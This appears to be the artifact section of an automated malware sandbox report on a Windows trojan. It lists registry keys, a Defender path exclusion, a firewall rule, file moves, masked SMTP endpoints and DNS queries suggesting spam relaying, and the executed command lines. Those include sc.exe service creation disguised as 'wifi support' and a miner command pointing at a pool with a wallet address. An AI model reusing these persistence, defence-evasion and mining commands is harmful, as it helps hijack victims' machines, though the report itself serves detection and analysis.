Technical Information
The entries below are the artifacts recorded during analysis, in this order: registry keys written (service configuration and a Windows Defender path exclusion), the firewall rule added, files and paths created or moved, network endpoints contacted (host:port, with hostnames and addresses partially masked by '#'), DNS queries issued, and the command lines executed.
- [<HKLM>\System\CurrentControlSet\Services\xbwvmwtp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\xbwvmwtp] 'ImagePath' = '%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\xbwvmwtp] 'ImagePath' = '%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe'
- 'xbwvmwtp' %WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d"<Full path to file>"
- 'xbwvmwtp' %WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\xbwvmwtp' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\lfbhscua.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\lfbhscua.exe to %WINDIR%\syswow64\xbwvmwtp\lfbhscua.exe
- 'de###twax.ru':443
- 'sh########l.mx.a.cloudfilter.net':25
- 'as##.tpg.com.au':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx.#xy.top':25
- 'in#####.mail.nethere.net':25
- 'mx#.#ate.com':25
- 'gi#####.##il.protection.outlook.com':25
- 'MX.#####l.smarshmail.com':25
- 'fa###ool.xyz':10060
- 'mg####01.vircom.com':25
- 'mx#.##tsolmail.net':25
- '15#.#01.1.224':443
- 'mx##.#indstream.net':25
- 'ALT1.ASPMX.L.GOOGLE.COM':25
- 'mx.###intpcs.com':25
- 'mx###.#kymail.net.br':25
- 'mx#######e02.gslb.pphosted.com':25
- 'ma##.#wisscom.com':25
- 'mx###.###east.atmailcloud.com':25
- 'go###e.co.jp':443
- 'fu#####ter4.fullnet.net':25
- 'si###com.com':25
- 'mx#######c03.gslb.pphosted.com':25
- 'ma##.#illdotcom.com':25
- 'ma##.#ailerhost.net':25
- 'mx.##teria.pl':25
- 'mx##.mail.com':25
- 'ma##.#irtexco.com':25
- 'ma##.#-email.net':25
- '5.##.37.41':427
- 'de###twax.ru':483
- 'mx#.#smcom.com':25
- 'mx#.#omcast.net':25
- 'sa#########.mail.protection.outlook.com':25
- 'sm##.##cureserver.net':25
- 'mx##.##rnetsecurity.com':25
- 'al######x-vip1.prodigy.net':25
- '19#.#6.146.42':427
- '19#.#6.146.43':427
- '19#.#6.146.41':427
- '95.##6.195.92':427
- '21#.#27.140.23':427
- 'google.com':80
- 'alt2.aspmx.l.google.com':25
- 'cl#####6.netcore.co.in':25
- 'mx.######mail.rediff.akadns.net':25
- 'mx##.##il.icloud.com':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'cu#######-2.in.mailcontrol.com':25
- 'mt##.##0.yahoodns.net':25
- 'jo########m-com.p10.mxthunder.com':25
- 'mx.##.#tinternet.com':25
- 'ma#####shal.carsoup.com':25
- 'ap##########in.mail.protection.outlook.com':25
- 'as##.#inet.net.au':25
- 'cl######g.mailcontrol.com':25
- 'ma##.#otmal.co.uk':25
- http://www.google.com/
- 'de###twax.ru':443
- 'ma##.#-email.net':25
- 'cl######g.mailcontrol.com':25
- 'as##.tpg.com.au':25
- 'mx.#xy.top':25
- 'in#####.mail.nethere.net':25
- 'aspmx.l.google.com':25
- 'gi#####.##il.protection.outlook.com':25
- 'fa###ool.xyz':10060
- 'mg####01.vircom.com':25
- 'mx#.##tsolmail.net':25
- '15#.#01.1.224':443
- 'ma##.#irtexco.com':25
- 'mx###.#kymail.net.br':25
- 'go###e.co.jp':443
- 'fu#####ter4.fullnet.net':25
- 'si###com.com':25
- 'ma##.#illdotcom.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx.##teria.pl':25
- 'ap##########in.mail.protection.outlook.com':25
- 'ma#####shal.carsoup.com':25
- 'de###twax.ru':483
- '19#.#6.146.42':427
- '19#.#6.146.41':427
- '21#.#27.140.23':427
- '19#.#6.146.43':427
- '5.##.37.41':427
- '95.##6.195.92':427
- 'mx##.##rnetsecurity.com':25
- 'mx#.#smcom.com':25
- 'al######x-vip1.prodigy.net':25
- 'sa#########.mail.protection.outlook.com':25
- 'cl#####6.netcore.co.in':25
- 'mx.######mail.rediff.akadns.net':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mt##.##0.yahoodns.net':25
- 'mx.##.#tinternet.com':25
- 'jo########m-com.p10.mxthunder.com':25
- 'cu#######-2.in.mailcontrol.com':25
- 'ALT1.ASPMX.L.GOOGLE.COM':25
- DNS ASK de###twax.ru
- DNS ASK mx##.#indstream.net
- DNS ASK wi###tream.net
- DNS ASK ma##.#irtexco.com
- DNS ASK vi###xco.com
- DNS ASK ma###raph.de
- DNS ASK ha######oadssecurity.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK fa###ool.xyz
- DNS ASK sa#####ntadvisors.com
- DNS ASK mg####01.vircom.com
- DNS ASK vi##om.com
- DNS ASK MX.#####l.smarshmail.com
- DNS ASK sa#####ntadvisor.com
- DNS ASK gi#####.##il.protection.outlook.com
- DNS ASK gi#.net
- DNS ASK aspmx.l.google.com
- DNS ASK ex###com.com
- DNS ASK mx#.#ate.com
- DNS ASK na##.com
- DNS ASK in#####.mail.nethere.net
- DNS ASK ne##ere.com
- DNS ASK di######nnovationsny.com
- DNS ASK tp#.comau
- DNS ASK sh##om.com
- DNS ASK sp###tpcs.com
- DNS ASK mx.###intpcs.com
- DNS ASK ad###com.com
- DNS ASK ALT1.ASPMX.L.GOOGLE.COM
- DNS ASK cr#####w-schools.org
- DNS ASK mx.##teria.pl
- DNS ASK in##ria.pl
- DNS ASK ma##.#ailerhost.net
- DNS ASK sp##com.com
- DNS ASK ma##.#illdotcom.com
- DNS ASK wi###otcom.com
- DNS ASK on###intcom.com
- DNS ASK sp####photmail.com
- DNS ASK mx#######c03.gslb.pphosted.com
- DNS ASK si###com.com
- DNS ASK qu###antcom.com
- DNS ASK fu#####ter4.fullnet.net
- DNS ASK so###com.com
- DNS ASK go###e.co.jp
- DNS ASK mx###.###east.atmailcloud.com
- DNS ASK ma####reetcom.com
- DNS ASK st##com.com
- DNS ASK ma##.#wisscom.com
- DNS ASK sw###com.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK bm##om.com
- DNS ASK mx###.#kymail.net.br
- DNS ASK ho###l.co.uk
- DNS ASK mx.#xy.top
- DNS ASK nb###com.com
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK ic##ud.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK co###cola.com
- DNS ASK jo########m-com.p10.mxthunder.com
- DNS ASK jo###toncom.com
- DNS ASK mx.######mail.rediff.akadns.net
- DNS ASK re###fmail.com
- DNS ASK cl#####6.netcore.co.in
- DNS ASK vi###ntek.co.in
- DNS ASK google.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK at#.net
- DNS ASK mx##.##rnetsecurity.com
- DNS ASK ma###ncom.com
- DNS ASK sm##.##cureserver.net
- DNS ASK ne###nix.com
- DNS ASK sa#########.mail.protection.outlook.com
- DNS ASK sa##nsa.com
- DNS ASK mx#.#omcast.net
- DNS ASK co##ast.net
- DNS ASK mx#.#smcom.com
- DNS ASK cs##om.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK or####pharma.com
- DNS ASK as##.tpg.com.au
- DNS ASK tp#.com.au
- DNS ASK sh########l.mx.a.cloudfilter.net
- DNS ASK sh#w.ca
- DNS ASK mx##.mail.com
- DNS ASK us#.com
- DNS ASK oz###il.com.au
- DNS ASK ma##.#-email.net
- DNS ASK pr###com.com
- DNS ASK cl######g.mailcontrol.com
- DNS ASK se##lco.com
- DNS ASK ne####hinfocom.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK as##.#inet.net.au
- DNS ASK we###et.com.au
- DNS ASK ap##########in.mail.protection.outlook.com
- DNS ASK ap###ooledu.in
- DNS ASK ma#####shal.carsoup.com
- DNS ASK cu###com.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK bt###ernet.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ro###tmail.com
- DNS ASK cu#######-2.in.mailcontrol.com
- DNS ASK co#.net
- DNS ASK ma##.#otmal.co.uk
- '%WINDIR%\syswow64\xbwvmwtp\lfbhscua.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\xbwvmwtp\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfbhscua.exe" %WINDIR%\SysWOW64\xbwvmwtp\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create xbwvmwtp binPath= "%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description xbwvmwtp "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start xbwvmwtp' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\xbwvmwtp\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfbhscua.exe" %WINDIR%\SysWOW64\xbwvmwtp\
- '%WINDIR%\syswow64\sc.exe' create xbwvmwtp binPath= "%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description xbwvmwtp "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start xbwvmwtp
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half